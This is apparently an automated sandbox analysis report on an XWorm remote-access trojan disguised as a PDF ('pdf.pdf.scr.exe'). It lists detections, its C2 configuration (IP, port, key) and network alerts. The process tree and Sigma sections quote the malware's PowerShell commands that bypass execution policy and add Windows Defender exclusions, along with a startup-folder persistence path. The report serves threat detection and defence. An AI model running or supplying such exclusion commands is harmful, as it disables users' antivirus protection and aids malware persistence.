Edit tour

Windows Analysis Report
F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe

Overview

General Information

Sample name:	F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe
Analysis ID:	1528881
MD5:	70566f5275ea7ac9fca0ebd9c31bb101
SHA1:	6957d5f073ccf99c3a65563ad70d7fca33839250
SHA256:	5602833d8b536edfbf979eb740f3345c291a68fc11f868dca1bef92f722420fa
Tags:	AsyncRATexeuser-threatcat_ch
Infos:

Detection

XWorm

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for domain / URL

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected AntiVM3

Yara detected XWorm

.NET source code contains method to dynamically call methods (often used by packers)

.NET source code contains potential unpacker

AI detected suspicious sample

Adds a directory exclusion to Windows Defender

Bypasses PowerShell execution policy

C2 URLs / IPs found in malware configuration

Initial sample is a PE file and has a suspicious name

Loading BitLocker PowerShell Module

Machine Learning detection for dropped file

Machine Learning detection for sample

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Sample uses string decryption to hide its real strings

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Uses an obfuscated file name to hide its real file extension (double extension)

AV process strings found (often used to terminate AV products)

Abnormal high CPU Usage

Allocates memory with a write watch (potentially for evading sandboxes)

Binary contains a suspicious time stamp

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates a start menu entry (Start Menu\Programs\Startup)

Creates processes with suspicious names

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Drops PE files

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Sigma detected: Change PowerShell Policies to an Insecure Level

Sigma detected: Powershell Defender Exclusion

Sigma detected: Startup Folder File Write

Stores files to the Windows start menu directory

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Process Tree

System is w10x64

F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe (PID: 3608 cmdline: "C:\Users\user\Desktop\F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe" MD5: 70566F5275EA7AC9FCA0EBD9C31BB101)

F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe (PID: 6608 cmdline: "C:\Users\user\Desktop\F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe" MD5: 70566F5275EA7AC9FCA0EBD9C31BB101)

powershell.exe (PID: 4592 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe' MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 5972 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 2848 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe' MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 1896 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 528 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\XClient.exe' MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 3652 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 1784 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XClient.exe' MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 7036 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
XWorm	Malware with wide range of capabilities ranging from RAT to ransomware.	No Attribution	https://any.run/cybersecurity-blog/xworm-malware-communication-analysis/ https://any.run/cybersecurity-blog/xworm-technical-analysis-of-a-new-malware-version/ https://blog.cyble.com/2022/08/19/evilcoder-project-selling-multiple-dangerous-tools-online/ https://cert.pl/en/posts/2023/10/deworming-the-xworm/ https://embee-research.ghost.io/infrastructure-analysis-with-dns-pivoting/	https://malpedia.caad.fkie.fraunhofer.de/details/win.xworm

Malware Configuration

Threatname: Xworm

{"C2 url": ["104.250.180.178"], "Port": "7061", "Aes key": "<Xwormmm>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V5.2"}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000000.00000002.2087295289.0000000002A51000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
00000000.00000002.2087295289.0000000002A51000.00000004.00000800.00020000.00000000.sdmp	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x1887b:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x18918:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x18a2d:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x17e95:$cnc4: POST / HTTP/1.1
00000003.00000002.4530058708.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
00000003.00000002.4530058708.0000000000402000.00000040.00000400.00020000.00000000.sdmp	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0xcb33:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0xcbd0:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0xcce5:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0xc14d:$cnc4: POST / HTTP/1.1
00000000.00000002.2087295289.0000000002ACA000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
00000000.00000002.2087295289.0000000002ACA000.00000004.00000800.00020000.00000000.sdmp	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x14773:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x14810:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x14925:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x13d8d:$cnc4: POST / HTTP/1.1
00000000.00000002.2087295289.0000000002A6D000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
00000000.00000002.2087295289.0000000002A6D000.00000004.00000800.00020000.00000000.sdmp	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x599b3:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x59a50:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x59b65:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x58fcd:$cnc4: POST / HTTP/1.1
00000003.00000002.4534290807.0000000002EB1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
Process Memory Space: F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe PID: 3608	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
Process Memory Space: F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe PID: 3608	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe PID: 6608	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
Click to see the 7 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
0.2.F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe.2ab9c80.2.raw.unpack	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
0.2.F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe.2ab9c80.2.raw.unpack	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0xcd33:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0xcdd0:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0xcee5:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0xc34d:$cnc4: POST / HTTP/1.1
3.2.F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe.400000.0.unpack	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
3.2.F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe.400000.0.unpack	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0xcd33:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0xcdd0:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0xcee5:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0xc34d:$cnc4: POST / HTTP/1.1
0.2.F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe.2a5cb48.0.raw.unpack	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
0.2.F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe.2a5cb48.0.raw.unpack	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0xcd33:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0xcdd0:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0xcee5:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0xc34d:$cnc4: POST / HTTP/1.1
0.2.F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe.2ab9c80.2.unpack	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
0.2.F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe.2ab9c80.2.unpack	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0xaf33:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0xafd0:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0xb0e5:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0xa54d:$cnc4: POST / HTTP/1.1
0.2.F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe.2a5cb48.0.unpack	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
0.2.F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe.2a5cb48.0.unpack	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0xaf33:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0xafd0:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0xb0e5:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0xa54d:$cnc4: POST / HTTP/1.1
Click to see the 5 entries

Sigma Signatures

System Summary

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe", ParentImage: C:\Users\user\Desktop\F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe, ParentProcessId: 6608, ParentProcessName: F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe', ProcessId: 4592, ProcessName: powershell.exe

Sigma detected: Change PowerShell Policies to an Insecure Level

Source: Process started

Author: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe", ParentImage: C:\Users\user\Desktop\F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe, ParentProcessId: 6608, ParentProcessName: F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe', ProcessId: 4592, ProcessName: powershell.exe

Sigma detected: Powershell Defender Exclusion

Source: Process started

Sigma detected: Startup Folder File Write

Source: File created

Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: EventID: 11, Image: C:\Users\user\Desktop\F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe, ProcessId: 6608, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\XClient.lnk

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe", ParentImage: C:\Users\user\Desktop\F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe, ParentProcessId: 6608, ParentProcessName: F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe', ProcessId: 4592, ProcessName: powershell.exe

Suricata Signatures

ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-08T11:28:55.319169+0200	2852870	1	Malware Command and Control Activity Detected	104.250.180.178	7061	192.168.2.5	49763	TCP
2024-10-08T11:28:55.597433+0200	2852870	1	Malware Command and Control Activity Detected	104.250.180.178	7061	192.168.2.5	49763	TCP
2024-10-08T11:29:09.277703+0200	2852870	1	Malware Command and Control Activity Detected	104.250.180.178	7061	192.168.2.5	49763	TCP
2024-10-08T11:29:24.787453+0200	2852870	1	Malware Command and Control Activity Detected	104.250.180.178	7061	192.168.2.5	49763	TCP
2024-10-08T11:29:25.309226+0200	2852870	1	Malware Command and Control Activity Detected	104.250.180.178	7061	192.168.2.5	49763	TCP
2024-10-08T11:29:38.533244+0200	2852870	1	Malware Command and Control Activity Detected	104.250.180.178	7061	192.168.2.5	49763	TCP
2024-10-08T11:29:52.308168+0200	2852870	1	Malware Command and Control Activity Detected	104.250.180.178	7061	192.168.2.5	49763	TCP
2024-10-08T11:29:52.583064+0200	2852870	1	Malware Command and Control Activity Detected	104.250.180.178	7061	192.168.2.5	49763	TCP
2024-10-08T11:29:53.058733+0200	2852870	1	Malware Command and Control Activity Detected	104.250.180.178	7061	192.168.2.5	49763	TCP
2024-10-08T11:29:55.307665+0200	2852870	1	Malware Command and Control Activity Detected	104.250.180.178	7061	192.168.2.5	49763	TCP
2024-10-08T11:29:58.707104+0200	2852870	1	Malware Command and Control Activity Detected	104.250.180.178	7061	192.168.2.5	49763	TCP
2024-10-08T11:29:58.947532+0200	2852870	1	Malware Command and Control Activity Detected	104.250.180.178	7061	192.168.2.5	49763	TCP
2024-10-08T11:30:09.067654+0200	2852870	1	Malware Command and Control Activity Detected	104.250.180.178	7061	192.168.2.5	49763	TCP
2024-10-08T11:30:14.247741+0200	2852870	1	Malware Command and Control Activity Detected	104.250.180.178	7061	192.168.2.5	49763	TCP
2024-10-08T11:30:14.487513+0200	2852870	1	Malware Command and Control Activity Detected	104.250.180.178	7061	192.168.2.5	49763	TCP
2024-10-08T11:30:17.577485+0200	2852870	1	Malware Command and Control Activity Detected	104.250.180.178	7061	192.168.2.5	49763	TCP
2024-10-08T11:30:24.769271+0200	2852870	1	Malware Command and Control Activity Detected	104.250.180.178	7061	192.168.2.5	49763	TCP
2024-10-08T11:30:25.018139+0200	2852870	1	Malware Command and Control Activity Detected	104.250.180.178	7061	192.168.2.5	49763	TCP
2024-10-08T11:30:25.257540+0200	2852870	1	Malware Command and Control Activity Detected	104.250.180.178	7061	192.168.2.5	49763	TCP
2024-10-08T11:30:25.497328+0200	2852870	1	Malware Command and Control Activity Detected	104.250.180.178	7061	192.168.2.5	49763	TCP
2024-10-08T11:30:39.637714+0200	2852870	1	Malware Command and Control Activity Detected	104.250.180.178	7061	192.168.2.5	49763	TCP
2024-10-08T11:30:39.878783+0200	2852870	1	Malware Command and Control Activity Detected	104.250.180.178	7061	192.168.2.5	49763	TCP
2024-10-08T11:30:40.417562+0200	2852870	1	Malware Command and Control Activity Detected	104.250.180.178	7061	192.168.2.5	49763	TCP
2024-10-08T11:30:41.067586+0200	2852870	1	Malware Command and Control Activity Detected	104.250.180.178	7061	192.168.2.5	49763	TCP
2024-10-08T11:30:41.337324+0200	2852870	1	Malware Command and Control Activity Detected	104.250.180.178	7061	192.168.2.5	49763	TCP
2024-10-08T11:30:55.308301+0200	2852870	1	Malware Command and Control Activity Detected	104.250.180.178	7061	192.168.2.5	49763	TCP
2024-10-08T11:30:55.597512+0200	2852870	1	Malware Command and Control Activity Detected	104.250.180.178	7061	192.168.2.5	49763	TCP
2024-10-08T11:30:56.852862+0200	2852870	1	Malware Command and Control Activity Detected	104.250.180.178	7061	192.168.2.5	49763	TCP
2024-10-08T11:30:59.587757+0200	2852870	1	Malware Command and Control Activity Detected	104.250.180.178	7061	192.168.2.5	49763	TCP
2024-10-08T11:31:00.618345+0200	2852870	1	Malware Command and Control Activity Detected	104.250.180.178	7061	192.168.2.5	49763	TCP
2024-10-08T11:31:03.526304+0200	2852870	1	Malware Command and Control Activity Detected	104.250.180.178	7061	192.168.2.5	49763	TCP
2024-10-08T11:31:17.023029+0200	2852870	1	Malware Command and Control Activity Detected	104.250.180.178	7061	192.168.2.5	49763	TCP
2024-10-08T11:31:20.621639+0200	2852870	1	Malware Command and Control Activity Detected	104.250.180.178	7061	192.168.2.5	49763	TCP
2024-10-08T11:31:23.460898+0200	2852870	1	Malware Command and Control Activity Detected	104.250.180.178	7061	192.168.2.5	49763	TCP
2024-10-08T11:31:26.710516+0200	2852870	1	Malware Command and Control Activity Detected	104.250.180.178	7061	192.168.2.5	49763	TCP
2024-10-08T11:31:31.903118+0200	2852870	1	Malware Command and Control Activity Detected	104.250.180.178	7061	192.168.2.5	49763	TCP
2024-10-08T11:31:34.402808+0200	2852870	1	Malware Command and Control Activity Detected	104.250.180.178	7061	192.168.2.5	49763	TCP
2024-10-08T11:31:34.827674+0200	2852870	1	Malware Command and Control Activity Detected	104.250.180.178	7061	192.168.2.5	49763	TCP
2024-10-08T11:31:35.947532+0200	2852870	1	Malware Command and Control Activity Detected	104.250.180.178	7061	192.168.2.5	49763	TCP
2024-10-08T11:31:43.704303+0200	2852870	1	Malware Command and Control Activity Detected	104.250.180.178	7061	192.168.2.5	49763	TCP
2024-10-08T11:31:45.968055+0200	2852870	1	Malware Command and Control Activity Detected	104.250.180.178	7061	192.168.2.5	49763	TCP
2024-10-08T11:31:52.502745+0200	2852870	1	Malware Command and Control Activity Detected	104.250.180.178	7061	192.168.2.5	49763	TCP
2024-10-08T11:31:55.117962+0200	2852870	1	Malware Command and Control Activity Detected	104.250.180.178	7061	192.168.2.5	49763	TCP
2024-10-08T11:31:56.120320+0200	2852870	1	Malware Command and Control Activity Detected	104.250.180.178	7061	192.168.2.5	49763	TCP
2024-10-08T11:31:57.245664+0200	2852870	1	Malware Command and Control Activity Detected	104.250.180.178	7061	192.168.2.5	49763	TCP
2024-10-08T11:31:57.988851+0200	2852870	1	Malware Command and Control Activity Detected	104.250.180.178	7061	192.168.2.5	49763	TCP
2024-10-08T11:32:03.187760+0200	2852870	1	Malware Command and Control Activity Detected	104.250.180.178	7061	192.168.2.5	49763	TCP
2024-10-08T11:32:05.393102+0200	2852870	1	Malware Command and Control Activity Detected	104.250.180.178	7061	192.168.2.5	49763	TCP
2024-10-08T11:32:14.921943+0200	2852870	1	Malware Command and Control Activity Detected	104.250.180.178	7061	192.168.2.5	49763	TCP
2024-10-08T11:32:23.837337+0200	2852870	1	Malware Command and Control Activity Detected	104.250.180.178	7061	192.168.2.5	49763	TCP
2024-10-08T11:32:25.332473+0200	2852870	1	Malware Command and Control Activity Detected	104.250.180.178	7061	192.168.2.5	49763	TCP

ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-08T11:28:55.601362+0200	2852923	1	Malware Command and Control Activity Detected	192.168.2.5	49763	104.250.180.178	7061	TCP
2024-10-08T11:29:09.279953+0200	2852923	1	Malware Command and Control Activity Detected	192.168.2.5	49763	104.250.180.178	7061	TCP
2024-10-08T11:29:24.791041+0200	2852923	1	Malware Command and Control Activity Detected	192.168.2.5	49763	104.250.180.178	7061	TCP
2024-10-08T11:29:38.535250+0200	2852923	1	Malware Command and Control Activity Detected	192.168.2.5	49763	104.250.180.178	7061	TCP
2024-10-08T11:29:52.310917+0200	2852923	1	Malware Command and Control Activity Detected	192.168.2.5	49763	104.250.180.178	7061	TCP
2024-10-08T11:29:52.584824+0200	2852923	1	Malware Command and Control Activity Detected	192.168.2.5	49763	104.250.180.178	7061	TCP
2024-10-08T11:29:52.874212+0200	2852923	1	Malware Command and Control Activity Detected	192.168.2.5	49763	104.250.180.178	7061	TCP
2024-10-08T11:29:53.060251+0200	2852923	1	Malware Command and Control Activity Detected	192.168.2.5	49763	104.250.180.178	7061	TCP
2024-10-08T11:29:58.708780+0200	2852923	1	Malware Command and Control Activity Detected	192.168.2.5	49763	104.250.180.178	7061	TCP
2024-10-08T11:29:58.949192+0200	2852923	1	Malware Command and Control Activity Detected	192.168.2.5	49763	104.250.180.178	7061	TCP
2024-10-08T11:29:59.199640+0200	2852923	1	Malware Command and Control Activity Detected	192.168.2.5	49763	104.250.180.178	7061	TCP
2024-10-08T11:29:59.207987+0200	2852923	1	Malware Command and Control Activity Detected	192.168.2.5	49763	104.250.180.178	7061	TCP
2024-10-08T11:30:09.069812+0200	2852923	1	Malware Command and Control Activity Detected	192.168.2.5	49763	104.250.180.178	7061	TCP
2024-10-08T11:30:14.249438+0200	2852923	1	Malware Command and Control Activity Detected	192.168.2.5	49763	104.250.180.178	7061	TCP
2024-10-08T11:30:14.489380+0200	2852923	1	Malware Command and Control Activity Detected	192.168.2.5	49763	104.250.180.178	7061	TCP
2024-10-08T11:30:17.580130+0200	2852923	1	Malware Command and Control Activity Detected	192.168.2.5	49763	104.250.180.178	7061	TCP
2024-10-08T11:30:24.770766+0200	2852923	1	Malware Command and Control Activity Detected	192.168.2.5	49763	104.250.180.178	7061	TCP
2024-10-08T11:30:25.022215+0200	2852923	1	Malware Command and Control Activity Detected	192.168.2.5	49763	104.250.180.178	7061	TCP
2024-10-08T11:30:25.268298+0200	2852923	1	Malware Command and Control Activity Detected	192.168.2.5	49763	104.250.180.178	7061	TCP
2024-10-08T11:30:39.640700+0200	2852923	1	Malware Command and Control Activity Detected	192.168.2.5	49763	104.250.180.178	7061	TCP
2024-10-08T11:30:39.883250+0200	2852923	1	Malware Command and Control Activity Detected	192.168.2.5	49763	104.250.180.178	7061	TCP
2024-10-08T11:30:40.447920+0200	2852923	1	Malware Command and Control Activity Detected	192.168.2.5	49763	104.250.180.178	7061	TCP
2024-10-08T11:30:41.072707+0200	2852923	1	Malware Command and Control Activity Detected	192.168.2.5	49763	104.250.180.178	7061	TCP
2024-10-08T11:30:41.342401+0200	2852923	1	Malware Command and Control Activity Detected	192.168.2.5	49763	104.250.180.178	7061	TCP
2024-10-08T11:30:55.602359+0200	2852923	1	Malware Command and Control Activity Detected	192.168.2.5	49763	104.250.180.178	7061	TCP
2024-10-08T11:30:56.864167+0200	2852923	1	Malware Command and Control Activity Detected	192.168.2.5	49763	104.250.180.178	7061	TCP
2024-10-08T11:30:57.999989+0200	2852923	1	Malware Command and Control Activity Detected	192.168.2.5	49763	104.250.180.178	7061	TCP
